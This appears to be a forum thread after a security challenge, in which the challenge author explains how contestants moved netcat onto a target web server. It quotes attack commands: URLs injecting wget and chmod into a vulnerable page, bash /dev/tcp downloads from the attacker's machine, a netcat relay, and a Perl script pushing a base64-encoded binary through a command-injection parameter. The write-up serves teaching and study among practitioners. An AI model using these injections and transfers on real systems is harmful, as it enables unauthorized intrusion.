Congrats !! to all the winners. It surely was a difficult one. But I have to say, I learned a lots and it was fun trying to solve it.

Thanks Ed, for another Masterpiece.

VJ

cdman,

You know, that's a really good point!  Sorry I overlooked it.  I typically use a patched version of the Hobbit nc for Linux/UNIX or Weld Pond's for Windows, and rely on its syntax.  To execute a command, I run it with -e [command].  If I want a command with parameters or multiple commands, I use -e followed by a .bat file (Windows) or a .sh file (Linux/UNIX), which contains the command(s) and parameters.  Thus, I haven't used the -c option, because it's not included in the Netcat version I use, plus I haven't needed it.  However, I do see the value of having the -c option, and now understand why you used it.  Thanks for the clarification.  Great work, man!

Thanks again--
--Ed.

Hi folks,

I've got a question concerning this contest. In the contest it says: "Things got even worse, as Kris explored the machine’s file system only to find that Netcat was not included in this distribution, which appeared to be a stripped down Fedora Linux machine." So there is no netcat on web1.

But in the answers from Wesley to question 1 it shows to use netcat on web1 and also in the answer to question 2 it says: "Well, on web1, you could make another Netcat relay, this time a client-to-client relay, as follows:

# mknod backpipe2 p
# nc –nv door1 445 0<backpipe2 | nc –nv krislaptop 80 | tee backpipe2"

Could anybody explain to me how to use netcat on a machine where it isn't on? Or did I overlook something or did I make some other mistake?

Thanks for answering this comprehension question.

the_gamer,

I too went at this contest in the same fashion. When I approached this I went at it with the view that if I wanted netcat on web1 that I would need to put it on there myself. I thought it was only in my arsenal, but getting it on the box was up to me. This is why I chose ssh over netcat, since it would already be provided.

-Paul

I purposely designed the challenge so that it did not include Netcat on that server so that you'd have to devise a method for moving it there.  Sorry that I didn't include that step in my answers.  My answers were getting really long (11 typed pages), so I didn't include every single command.  I'm glad you guys asked about this one, because it deserves to be talked about in more detail.  Thank you!  These challenges are all about sharing techniques among security practitioners, and the techniques associated with this one were fantastic.

Mark Baggett's answer did indeed include a method for getting Netcat there, but he actually sent me his solution in multiple parts.  I'm sorry, but I did not include the part of Mark's answer that mentioned how he got nc there.  I'll mention his technique below (with an excerpt of his submitted answer part that included the transfer) below as I go through the methods for moving nc to web1.

So, let me tell you about how different people (including Mark), got Netcat to web1.  All of these techniques relied on the command-injection flaw on web1:

Method i) Inject a command that invokes wget to connect to Santa's laptop and pull down the Linux version of Netcat.  This is the method used by Mark Baggett and many other people.  Here is the syntax he specified in the other component of his answer:

"from santa's linux box
               nc -l -p 3000 < nc
       in webpage we do something like this...
               http://web1?vulnerablepage.php?vulnerable=normal; 
wget jailmasterlaptop:3000
       Give it a minute or so to finish the transfer to the 
machine and hits control-c on the netcat on his box
               http://web1?vulnerablepage.php?vulnerable=normal;   
mv index.html nc
               http://web1?vulnerablepage.php?vulnerable=normal; 
chmod 777 nc"

It was a nice approach, in that he remembered to move index.html into nc (in effect renaming it), and he even chmod'ed it so that any user (including apache) could read, write, and execute it.  I gave Mark extra points for remembering the mv and chmod, because several others forgot it.  Richard J. used a similar technique, as did Peter Jackson (who also showed how it could be done with curl).  Several others did as well.

Method ii) Inject the echo command to build an FTP command file on web1, and then inject a command to invoke an FTP client to run commands from that file.  Zoher used a variation of this technique with the lftp command.

Method iii) Use tftp to move the file by injecting a command to invoke the tftp client on web1.  This method depends on Santa's Linux box having a tftpd and web1 having a tftp client, which they may or may not have.

Method iv) Using /dev/tcp on web1.  I really liked this approach, because it uses the built-in capabilities of bash on many Linuxes for interacting with /dev/tcp via shell redirects.  Several people tried this, but many of them had improper syntax.  As you may know, /dev/tcp can be used via bash on some Linux systems (typically non-Debian derived Linuxes) to open an outbound TCP connection.  You can push data across that connection easily by just cat'ting or echo'ing it into /dev/tcp.  But, how can you pull data across it, for file transfer?  Raul Siles' answer included syntax for doing that, as follows:

"Kris made available a copy of the Linux netcat binary through [his own laptop] on port TCP/80 (a little stealthy trick to simulate a web server connection in case someone checks outbound traffic from web1) using netcat:

[Santa's_Laptop] $ nc -l -p 80 < /usr/bin/nc

Using the web-based command injection flaw, Kris launched a series of commands to initiate a connection from web1 to [his own laptop] on port TCP/80 and retrieve the Linux netcat binary. The file was copied under /tmp, as a readable and executable file.

[web1] $ exec 6<>/dev/tcp/Linnie/80
[web1] $ cat <&6 >/tmp/nc
[web1] $ ls -l /tmp/nc
-rw-rw-r-- 1 apache apache 18596 2008-12-30 13:24 /tmp/nc
[web1] $ md5sum /tmp/nc
77e752183c698f76f00c0de5d070314d  /tmp/nc
[web1] $ chmod 500 /tmp/nc
[web1] $
"

Ryan L. had a nice variation, which again involved setting up a Netcat listener on Santa's own box, ready to deliver up the netcat executable.  He then injected this command into web1:

"cat <
/dev/tcp/<Kris's IP Address>/8080 > /tmp/nc; chmod 755 /tmp/nc;"

These are quite nice techniques, and kudos to Raul and Ryan for using it.  Note that both remembered the chmod.  Raul even went further and md5sum'med it.  Note that Raul, to get the output displayed, must be using an interactive shell, likely delivered via /dev/tcp on another port.

Method iv) Create a perl script that runs on Santa's laptop to encode and move the file.  Peter Jackson used this approach, saying it's what he'd rely on if wget or curl were not available.  His script base-64 encoded netcat and chopped it up into little parts, transmitting them via the command injection flaw 57 bytes at a time, injecting the echo command into web1 with >> to append the given chunk of Netcat to the file he built on the target. This also was a very cool approach.  Here's Peter's code:

-------
#!/usr/bin/perl
use MIME::Base64 qw(encode_base64);

use LWP 5.64;
my $browser = LWP::UserAgent->new;

# read netcat binary in 57 byte chucks and submit
# base64 encoded string to the vulntiable URL

open(FILE, "nc") or die "$!";

while (read(FILE, my $buf, 57)) {
   my $base64chr = encode_base64($buf);
   # remove the line break
   chomp($base64chr);

   my $response = $browser->post( 'http://web1/vuln.cgi',
       [ 'cmd' => "echo $base64chr >> /tmp/.../nc.base64" ]
   );

   die "$url error: ", $response->status_line
     unless $response->is_success;
}
close(FILE);
-----

There were some other variations and approaches, but those were the main ones.

Again, as you can see, these answers were stellar, which is why we saw so many honorable mentions.

Thanks again, guys!

--Ed.

Ed, thank you very much for that nice challenge and that addition to the solution